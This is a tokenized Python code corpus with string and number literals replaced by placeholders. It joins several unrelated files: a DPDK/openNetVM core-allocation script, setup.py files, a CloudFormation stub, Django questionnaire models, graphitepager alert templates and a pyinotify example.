core [ field ] ) <EOL> if core [ "<STR_LIT>" ] not in cores : <EOL> cores . append ( core [ "<STR_LIT>" ] ) <EOL> if core [ "<STR_LIT>" ] not in sockets : <EOL> sockets . append ( core [ "<STR_LIT>" ] ) <EOL> key = ( core [ "<STR_LIT>" ] , core [ "<STR_LIT>" ] ) <EOL> if key not in core_map : <EOL> core_map [ key ] = [ ] <EOL> core_map [ key ] . append ( core [ "<STR_LIT>" ] ) <EOL> """<STR_LIT>""" <EOL> def dpdk_cpu_info_print ( ) : <EOL> global core_map <EOL> global cores <EOL> global core_map <EOL> max_processor_len = len ( str ( len ( cores ) * len ( sockets ) * <NUM_LIT:2> - <NUM_LIT:1> ) ) <EOL> max_core_map_len = max_processor_len * <NUM_LIT:2> + len ( '<STR_LIT>' ) + len ( '<STR_LIT>' ) <EOL> max_core_id_len = len ( str ( max ( cores ) ) ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" , cores <EOL> print "<STR_LIT>" , sockets <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT:U+0020>" . ljust ( max_core_id_len + len ( '<STR_LIT>' ) ) , <EOL> for s in sockets : <EOL> print "<STR_LIT>" % str ( s ) . ljust ( max_core_map_len - len ( '<STR_LIT>' ) ) , <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT:U+0020>" . ljust ( max_core_id_len + len ( '<STR_LIT>' ) ) , <EOL> for s in sockets : <EOL> print "<STR_LIT>" . ljust ( max_core_map_len ) , <EOL> print "<STR_LIT>" <EOL> for c in cores : <EOL> print "<STR_LIT>" % str ( c ) . ljust ( max_core_id_len ) , <EOL> for s in sockets : <EOL> print str ( core_map [ ( s , c ) ] ) . ljust ( max_core_map_len ) , <EOL> print "<STR_LIT:\n>" <EOL> """<STR_LIT>""" <EOL> def onvm_corelist ( ) : <EOL> global core_map <EOL> global cores <EOL> global core_map <EOL> global onvm_mgr_corelist <EOL> global onvm_nfs_corelist <EOL> mgr_core_index = <NUM_LIT:0> <EOL> nf_core_index = len ( cores ) - <NUM_LIT:1> <EOL> rem_cores = len ( cores ) <EOL> total_mgr_thread = ONVM_CONST_MGR_THRD <EOL> for i in range ( <NUM_LIT:0> , total_mgr_thread ) : <EOL> onvm_mgr_corelist . append ( core_map [ ( <NUM_LIT:0> , mgr_core_index ) ] ) <EOL> mgr_core_index += <NUM_LIT:1> <EOL> rem_cores -= <NUM_LIT:1> <EOL> while ( rem_cores > <NUM_LIT:0> ) : <EOL> if rem_cores >= <NUM_LIT:3> : <EOL> onvm_mgr_corelist . append ( core_map [ ( <NUM_LIT:0> , cores [ mgr_core_index ] ) ] ) <EOL> onvm_nfs_corelist . append ( core_map [ ( <NUM_LIT:0> , cores [ nf_core_index ] ) ] ) <EOL> onvm_nfs_corelist . append ( core_map [ ( <NUM_LIT:0> , cores [ nf_core_index - <NUM_LIT:1> ] ) ] ) <EOL> mgr_core_index += <NUM_LIT:1> <EOL> nf_core_index -= <NUM_LIT:2> <EOL> rem_cores -= <NUM_LIT:3> <EOL> elif rem_cores == <NUM_LIT:2> : <EOL> onvm_mgr_corelist . append ( core_map [ ( <NUM_LIT:0> , cores [ mgr_core_index ] ) ] ) <EOL> onvm_nfs_corelist . append ( core_map [ ( <NUM_LIT:0> , cores [ nf_core_index ] ) ] ) <EOL> mgr_core_index += <NUM_LIT:1> <EOL> nf_core_index -= <NUM_LIT:1> <EOL> rem_cores -= <NUM_LIT:2> <EOL> else : <EOL> break <EOL> """<STR_LIT>""" <EOL> def onvm_corelist_print ( ) : <EOL> global onvm_mgr_corelist <EOL> global onvm_nfs_corelist <EOL> onvm_print_header ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> mgr_corelist = "<STR_LIT>" <EOL> for c in onvm_mgr_corelist : <EOL> for i in c : <EOL> mgr_corelist += "<STR_LIT>" % ( i ) <EOL> print "<STR_LIT>" % ( mgr_corelist [ : len ( mgr_corelist ) - <NUM_LIT:1> ] ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % ( len ( onvm_nfs_corelist ) ) <EOL> for i in range ( len ( onvm_nfs_corelist ) - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> print "<STR_LIT>" % ( len ( onvm_nfs_corelist ) - <NUM_LIT:1> - i ) , <EOL> for c in onvm_nfs_corelist [ i ] : <EOL> print "<STR_LIT:%s>" % ( c ) <EOL> def onvm_print_header ( ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> """<STR_LIT>""" <EOL> def run ( ) : <EOL> if args . all : <EOL> dpdk_cpu_info ( ) <EOL> onvm_corelist ( ) <EOL> dpdk_cpu_info_print ( ) <EOL> onvm_corelist_print ( ) <EOL> elif args . onvm : <EOL> dpdk_cpu_info ( ) <EOL> onvm_corelist ( ) <EOL> onvm_corelist_print ( ) <EOL> elif args . cpu : <EOL> dpdk_cpu_info ( ) <EOL> dpdk_cpu_info_print ( ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> dpdk_cpu_info ( ) <EOL> onvm_corelist ( ) <EOL> onvm_corelist_print ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT:-c>" , "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> run ( ) </s>
<s> from distutils . core import setup <EOL> from distutils . extension import Extension <EOL> try : <EOL> from Cython . Build import cythonize <EOL> import numpy <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> import sys <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> setup ( <EOL> ext_modules = cythonize ( Extension ( <EOL> '<STR_LIT>' , <EOL> sources = [ <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> include_dirs = [ <EOL> numpy . get_include ( ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> language = "<STR_LIT>" , <EOL> ) ) , <EOL> ) </s>
<s> cft = CloudFormationTemplate ( description = "<STR_LIT>" ) <EOL> user_data_script = '''<STR_LIT>''' <EOL> cft . resources . add ( Resource ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : base64 ( user_data_script ) , <EOL> } ) <EOL> ) </s>
<s> from django . db import models <EOL> from transmeta import TransMeta <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from questionnaire import QuestionChoices <EOL> import re <EOL> from utils import split_numal <EOL> import json <EOL> from parsers import parse_checks , ParseException <EOL> from django . conf import settings <EOL> _numre = re . compile ( "<STR_LIT>" , re . I ) <EOL> class Subject ( models . Model ) : <EOL> STATE_CHOICES = [ <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ] <EOL> state = models . CharField ( max_length = <NUM_LIT:16> , default = "<STR_LIT>" , <EOL> choices = STATE_CHOICES , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> surname = models . CharField ( max_length = <NUM_LIT:64> , blank = True , null = True , <EOL> verbose_name = _ ( '<STR_LIT>' ) ) <EOL> givenname = models . CharField ( max_length = <NUM_LIT:64> , blank = True , null = True , <EOL> verbose_name = _ ( '<STR_LIT>' ) ) <EOL> email = models . EmailField ( null = True , blank = True , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> gender = models . CharField ( max_length = <NUM_LIT:8> , default = "<STR_LIT>" , blank = True , <EOL> verbose_name = _ ( '<STR_LIT>' ) , <EOL> choices = ( ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> ) <EOL> nextrun = models . DateField ( verbose_name = _ ( '<STR_LIT>' ) , blank = True , null = True ) <EOL> formtype = models . CharField ( max_length = <NUM_LIT:16> , default = '<STR_LIT:email>' , <EOL> verbose_name = _ ( '<STR_LIT>' ) , <EOL> choices = ( <EOL> ( "<STR_LIT:email>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) , ) ) <EOL> ) <EOL> language = models . CharField ( max_length = <NUM_LIT:2> , default = settings . LANGUAGE_CODE , <EOL> verbose_name = _ ( '<STR_LIT>' ) , choices = settings . LANGUAGES ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . surname , self . givenname , self . email ) <EOL> def next_runid ( self ) : <EOL> "<STR_LIT>" <EOL> return str ( self . nextrun . year ) <EOL> def last_run ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> query = RunInfoHistory . objects . filter ( subject = self ) <EOL> return query . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> return None <EOL> def history ( self ) : <EOL> return RunInfoHistory . objects . filter ( subject = self ) . order_by ( '<STR_LIT>' ) <EOL> def pending ( self ) : <EOL> return RunInfo . objects . filter ( subject = self ) . order_by ( '<STR_LIT>' ) <EOL> class Questionnaire ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT> ) <EOL> redirect_url = models . CharField ( max_length = <NUM_LIT> , help_text = "<STR_LIT>" , default = "<STR_LIT>" ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> def questionsets ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> self . __qscache = QuestionSet . objects . filter ( questionnaire = self ) . order_by ( '<STR_LIT>' ) <EOL> return self . __qscache <EOL> def questions ( self ) : <EOL> questions = [ ] <EOL> for questionset in self . questionsets ( ) : <EOL> questions += questionset . questions ( ) <EOL> return questions <EOL> class Meta : <EOL> permissions = ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> ) <EOL> class QuestionSet ( models . Model ) : <EOL> __metaclass__ = TransMeta <EOL> "<STR_LIT>" <EOL> questionnaire = models . ForeignKey ( Questionnaire ) <EOL> sortid = models . IntegerField ( ) <EOL> heading = models . CharField ( max_length = <NUM_LIT:64> ) <EOL> checks = models . CharField ( max_length = <NUM_LIT> , blank = True , <EOL> help_text = """<STR_LIT>""" ) <EOL> text = models . TextField ( u'<STR_LIT>' , help_text = "<STR_LIT>" ) <EOL> def questions ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> def numeric_number ( val ) : <EOL> matches = re . findall ( r'<STR_LIT>' , val ) <EOL> return int ( matches [ <NUM_LIT:0> ] ) if matches else <NUM_LIT:0> <EOL> self . __qcache = sorted ( Question . objects . filter ( questionset = self . id ) , key = lambda q : ( numeric_number ( q . number ) , q . number ) ) <EOL> return self . __qcache <EOL> def next ( self ) : <EOL> qs = self . questionnaire . questionsets ( ) <EOL> retnext = False <EOL> for q in qs : <EOL> if retnext : <EOL> return q <EOL> if q == self : <EOL> retnext = True <EOL> return None <EOL> def prev ( self ) : <EOL> qs = self . questionnaire . questionsets ( ) <EOL> last = None <EOL> for q in qs : <EOL> if q == self : <EOL> return last <EOL> last = q <EOL> def is_last ( self ) : <EOL> try : <EOL> return self . questionnaire . questionsets ( ) [ - <NUM_LIT:1> ] == self <EOL> except NameError : <EOL> return True <EOL> def is_first ( self ) : <EOL> try : <EOL> return self . questionnaire . questionsets ( ) [ <NUM_LIT:0> ] == self <EOL> except NameError : <EOL> return True <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . questionnaire . name , self . heading ) <EOL> class Meta : <EOL> translate = ( '<STR_LIT:text>' , ) <EOL> class RunInfo ( models . Model ) : <EOL> "<STR_LIT>" <EOL> subject = models . ForeignKey ( Subject ) <EOL> random = models . CharField ( max_length = <NUM_LIT:32> ) <EOL> runid = models . CharField ( max_length = <NUM_LIT:32> ) <EOL> questionset = models . ForeignKey ( QuestionSet , blank = True , null = True ) <EOL> emailcount = models . IntegerField ( default = <NUM_LIT:0> ) <EOL> created = models . DateTimeField ( auto_now_add = True ) <EOL> emailsent = models . DateTimeField ( null = True , blank = True ) <EOL> lastemailerror = models . CharField ( max_length = <NUM_LIT:64> , null = True , blank = True ) <EOL> state = models . CharField ( max_length = <NUM_LIT:16> , null = True , blank = True ) <EOL> cookies = models . TextField ( null = True , blank = True ) <EOL> tags = models . TextField ( <EOL> blank = True , <EOL> help_text = u"<STR_LIT>" <EOL> ) <EOL> skipped = models . TextField ( <EOL> blank = True , <EOL> help_text = u"<STR_LIT>" <EOL> ) <EOL> def save ( self , ** kwargs ) : <EOL> self . random = ( self . random or '<STR_LIT>' ) . lower ( ) <EOL> super ( RunInfo , self ) . save ( ** kwargs ) <EOL> def add_tags ( self , tags ) : <EOL> for tag in tags : <EOL> if self . tags : <EOL> self . tags += '<STR_LIT:U+002C>' <EOL> self . tags += tag <EOL> def remove_tags ( self , tags ) : <EOL> if not self . tags : <EOL> return <EOL> current_tags = self . tags . split ( '<STR_LIT:U+002C>' ) <EOL> for tag in tags : <EOL> try : <EOL> current_tags . remove ( tag ) <EOL> except ValueError : <EOL> pass <EOL> self . tags = "<STR_LIT:U+002C>" . join ( current_tags ) <EOL> def set_cookie ( self , key , value ) : <EOL> "<STR_LIT>" <EOL> key = key . lower ( ) . strip ( ) <EOL> cookies = self . get_cookiedict ( ) <EOL> if type ( value ) not in ( int , float , str , unicode , type ( None ) ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if value is None : <EOL> if key in cookies : <EOL> del cookies [ key ] <EOL> else : <EOL> if type ( value ) in ( '<STR_LIT:int>' , '<STR_LIT:float>' ) : <EOL> value = str ( value ) <EOL> cookies [ key ] = value <EOL> cstr = json . dumps ( cookies ) <EOL> self . cookies = cstr <EOL> self . save ( ) <EOL> self . __cookiecache = cookies <EOL> def get_cookie ( self , key , default = None ) : <EOL> if not self . cookies : <EOL> return default <EOL> d = self . get_cookiedict ( ) <EOL> return d . get ( key . lower ( ) . strip ( ) , default ) <EOL> def get_cookiedict ( self ) : <EOL> if not self . cookies : <EOL> return { } <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . __cookiecache = json . loads ( self . cookies ) <EOL> return self . __cookiecache <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . runid , self . subject . surname , self . subject . givenname ) <EOL> class Meta : <EOL> verbose_name_plural = '<STR_LIT>' <EOL> class RunInfoHistory ( models . Model ) : <EOL> subject = models . ForeignKey ( Subject ) <EOL> runid = models . CharField ( max_length = <NUM_LIT:32> ) <EOL> completed = models . DateField ( ) <EOL> tags = models . TextField ( <EOL> blank = True , <EOL> help_text = u"<STR_LIT>" <EOL> ) <EOL> skipped = models . TextField ( <EOL> blank = True , <EOL> help_text = u"<STR_LIT>" <EOL> ) <EOL> questionnaire = models . ForeignKey ( Questionnaire ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . runid , self . subject , self . completed ) <EOL> def answers ( self ) : <EOL> "<STR_LIT>" <EOL> return Answer . objects . filter ( subject = self . subject , runid = self . runid ) <EOL> class Meta : <EOL> verbose_name_plural = '<STR_LIT>' <EOL> class Question ( models . Model ) : <EOL> __metaclass__ = TransMeta <EOL> questionset = models . ForeignKey ( QuestionSet ) <EOL> number = models . CharField ( max_length = <NUM_LIT:8> , help_text = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> text = models . TextField ( blank = True , verbose_name = _ ( "<STR_LIT>" ) ) <EOL> type = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT:32> , <EOL> choices = QuestionChoices , <EOL> help_text = u"<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" ) <EOL> extra = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT> , blank = True , null = True , help_text = u"<STR_LIT>" ) <EOL> checks = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT> , blank = True , <EOL> null = True , help_text = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> '<STR_LIT>' ) <EOL> footer = models . TextField ( u"<STR_LIT>" , help_text = "<STR_LIT>" , blank = True ) <EOL> def questionnaire ( self ) : <EOL> return self . questionset . questionnaire <EOL> def getcheckdict ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( hasattr ( self , '<STR_LIT>' ) ) : <EOL> return self . __checkdict_cached <EOL> try : <EOL> self . __checkdict_cached = d = parse_checks ( self . sameas ( ) . checks or '<STR_LIT>' ) <EOL> except ParseException : <EOL> raise Exception ( "<STR_LIT>" % ( <EOL> self . number , self . sameas ( ) . checks ) ) <EOL> return d <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( unicode ( self . questionset ) , self . number , self . text ) <EOL> def sameas ( self ) : <EOL> if self . type == '<STR_LIT>' : <EOL> try : <EOL> kwargs = { } <EOL> for check , value in parse_checks ( self . checks ) : <EOL> if check == '<STR_LIT>' : <EOL> kwargs [ '<STR_LIT:id>' ] = value <EOL> break <EOL> elif check == '<STR_LIT>' : <EOL> kwargs [ '<STR_LIT>' ] = value <EOL> kwargs [ '<STR_LIT>' ] = self . questionset . questionnaire <EOL> break <EOL> self . __sameas = res = getattr ( self , "<STR_LIT>" , Question . objects . get ( ** kwargs ) ) <EOL> return res <EOL> except Question . DoesNotExist : <EOL> return Question ( type = '<STR_LIT>' ) <EOL> return self <EOL> def display_number ( self ) : <EOL> "<STR_LIT>" <EOL> m = _numre . match ( self . number ) <EOL> if m : <EOL> sub = m . group ( <NUM_LIT:2> ) <EOL> return "<STR_LIT>" + sub <EOL> return self . number <EOL> def choices ( self ) : <EOL> if self . type == '<STR_LIT>' : <EOL> return self . sameas ( ) . choices ( ) <EOL> res = Choice . objects . filter ( question = self ) . order_by ( '<STR_LIT>' ) <EOL> return res <EOL> def is_custom ( self ) : <EOL> return "<STR_LIT>" == self . sameas ( ) . type <EOL> def get_type ( self ) : <EOL> "<STR_LIT>" <EOL> t = self . sameas ( ) . type <EOL> if t == '<STR_LIT>' : <EOL> cd = self . sameas ( ) . getcheckdict ( ) <EOL> if '<STR_LIT:type>' not in cd : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return cd . get ( '<STR_LIT:type>' ) <EOL> return t <EOL> def questioninclude ( self ) : <EOL> return "<STR_LIT>" + self . get_type ( ) + "<STR_LIT>" <EOL> class Meta : <EOL> translate = ( '<STR_LIT:text>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Choice ( models . Model ) : <EOL> __metaclass__ = TransMeta <EOL> question = models . ForeignKey ( Question ) <EOL> sortid = models . IntegerField ( ) <EOL> value = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT:64> ) <EOL> text = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT:200> ) <EOL> tags = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT:64> , blank = True ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . question . number , self . sortid , self . text ) <EOL> class Meta : <EOL> translate = ( '<STR_LIT:text>' , ) <EOL> class Answer ( models . Model ) : <EOL> subject = models . ForeignKey ( Subject , help_text = u'<STR_LIT>' ) <EOL> question = models . ForeignKey ( Question , help_text = u"<STR_LIT>" ) <EOL> runid = models . CharField ( u'<STR_LIT>' , help_text = u"<STR_LIT>" , max_length = <NUM_LIT:32> ) <EOL> answer = models . TextField ( ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . question . number , self . subject . surname , self . subject . givenname ) <EOL> def split_answer ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return json . loads ( self . answer ) <EOL> except ValueError : <EOL> if '<STR_LIT>' in self . question . type : <EOL> return self . answer . split ( '<STR_LIT>' ) <EOL> else : <EOL> return [ self . answer ] <EOL> def check_answer ( self ) : <EOL> "<STR_LIT>" <EOL> return True <EOL> def save ( self , runinfo = None , ** kwargs ) : <EOL> self . _update_tags ( runinfo ) <EOL> super ( Answer , self ) . save ( ** kwargs ) <EOL> def _update_tags ( self , runinfo ) : <EOL> if not runinfo : <EOL> return <EOL> tags_to_add = [ ] <EOL> for choice in self . question . choices ( ) : <EOL> tags = choice . tags <EOL> if not tags : <EOL> continue <EOL> tags = tags . split ( '<STR_LIT:U+002C>' ) <EOL> runinfo . remove_tags ( tags ) <EOL> for split_answer in self . split_answer ( ) : <EOL> if unicode ( split_answer ) == choice . value : <EOL> tags_to_add . extend ( tags ) <EOL> runinfo . add_tags ( tags_to_add ) <EOL> runinfo . save ( ) </s>
<s> """<STR_LIT>""" <EOL> from businesstime import __version__ <EOL> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> license = open ( '<STR_LIT>' ) . read ( ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) + '<STR_LIT>' + <EOL> open ( '<STR_LIT>' ) . read ( ) , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' <EOL> ) </s>
<s> from jinja2 import Template <EOL> from urllib import urlencode <EOL> from graphitepager . level import Level <EOL> ALERT_MISSING_TEMPLATE = r"""<STR_LIT>""" <EOL> HTML_ALERT_MISSING_TEMPLATE = r"""<STR_LIT>""" <EOL> SLACK_ALERT_MISSING_TEMPLATE = r"""<STR_LIT>""" <EOL> STDOUT_MISSING_TEMPLATE = r"""<STR_LIT>""" <EOL> ALERT_TEMPLATE = r"""<STR_LIT>""" <EOL> HTML_ALERT_TEMPLATE = r"""<STR_LIT>""" <EOL> SLACK_ALERT_TEMPLATE = r"""<STR_LIT>""" <EOL> STDOUT_TEMPLATE = r"""<STR_LIT>""" <EOL> class Description ( object ) : <EOL> def __init__ ( self , template , graphite_url , alert , record , level , value ) : <EOL> self . template = template <EOL> self . graphite_url = graphite_url <EOL> self . alert = alert <EOL> self . record = record <EOL> self . level = level <EOL> self . value = value <EOL> def __str__ ( self ) : <EOL> return self . description_for_alert ( <EOL> self . template , <EOL> self . graphite_url , <EOL> self . alert , <EOL> self . record , <EOL> self . level , <EOL> self . value , <EOL> ) <EOL> def stdout ( self ) : <EOL> template = STDOUT_TEMPLATE <EOL> if self . level == Level . NO_DATA : <EOL> template = STDOUT_MISSING_TEMPLATE <EOL> return self . description_for_alert ( <EOL> template , <EOL> self . graphite_url , <EOL> self . alert , <EOL> self . record , <EOL> self . level , <EOL> self . value , <EOL> ) <EOL> def html ( self ) : <EOL> template = HTML_ALERT_TEMPLATE <EOL> if self . level == Level . NO_DATA : <EOL> template = HTML_ALERT_MISSING_TEMPLATE <EOL> return self . description_for_alert ( <EOL> template , <EOL> self . graphite_url , <EOL> self . alert , <EOL> self . record , <EOL> self . level , <EOL> self . value , <EOL> ) <EOL> def slack ( self ) : <EOL> template = SLACK_ALERT_TEMPLATE <EOL> if self . level == Level . NO_DATA : <EOL> template = SLACK_ALERT_MISSING_TEMPLATE <EOL> return self . description_for_alert ( <EOL> template , <EOL> self . graphite_url , <EOL> self . alert , <EOL> self . record , <EOL> self . level , <EOL> self . value , <EOL> ) <EOL> def description_for_alert ( self , <EOL> template , <EOL> graphite_url , <EOL> alert , <EOL> record , <EOL> level , <EOL> current_value ) : <EOL> context = dict ( locals ( ) ) <EOL> context [ '<STR_LIT>' ] = graphite_url <EOL> if type ( record ) == str : <EOL> context [ '<STR_LIT>' ] = alert . documentation_url ( ) <EOL> else : <EOL> context [ '<STR_LIT>' ] = alert . documentation_url ( record . target ) <EOL> url_params = ( <EOL> ( '<STR_LIT:width>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:target>' , alert . get ( '<STR_LIT:target>' ) ) , <EOL> ( '<STR_LIT:target>' , '<STR_LIT>' . format ( <EOL> alert . get ( '<STR_LIT>' ) ) ) , <EOL> ( '<STR_LIT:target>' , '<STR_LIT>' . format ( <EOL> alert . get ( '<STR_LIT>' ) ) ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> url_args = urlencode ( url_params ) <EOL> url = '<STR_LIT>' . format ( graphite_url , url_args ) <EOL> context [ '<STR_LIT>' ] = url . replace ( '<STR_LIT>' , '<STR_LIT:http>' ) <EOL> context [ '<STR_LIT>' ] = alert . value_for_level ( level ) <EOL> if level == Level . NOMINAL : <EOL> context [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> context [ '<STR_LIT>' ] = level <EOL> return Template ( template ) . render ( context ) <EOL> def _get_description ( graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value , <EOL> alert_template ) : <EOL> return Description ( <EOL> alert_template , <EOL> graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value <EOL> ) <EOL> def get_description ( graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value ) : <EOL> return _get_description ( graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value , <EOL> ALERT_TEMPLATE ) <EOL> def missing_target_description ( graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value ) : <EOL> return _get_description ( graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value , <EOL> ALERT_MISSING_TEMPLATE ) </s>
<s> from sixpack import __version__ <EOL> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> scripts = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> license = open ( '<STR_LIT>' ) . read ( ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) + '<STR_LIT>' + <EOL> open ( '<STR_LIT>' ) . read ( ) , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' , <EOL> install_requires = open ( '<STR_LIT>' ) . readlines ( ) , <EOL> include_package_data = True , <EOL> ) </s>
<s> import pyinotify <EOL> wm = pyinotify . WatchManager ( ) <EOL> r = wm . add_watch ( [ '<STR_LIT>' , '<STR_LIT>' ] , pyinotify . ALL_EVENTS ) <EOL> print r <EOL> try : <EOL> wm . add_watch ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> pyinotify . ALL_EVENTS , quiet = False ) <EOL> except pyinotify . WatchManagerError , err : <EOL> print err , err . wmd <EOL> try : <EOL> wm . update_watch ( <NUM_LIT> , mask = <NUM_LIT> , quiet = False ) <EOL> except pyinotify . WatchManagerError , err : <EOL> print err , err . wmd <EOL> try : <EOL> wm . rm_watch ( <NUM_LIT> , quiet = False ) <EOL> except pyinotify . WatchManagerError , err : <EOL> print err , err . wmd </s>
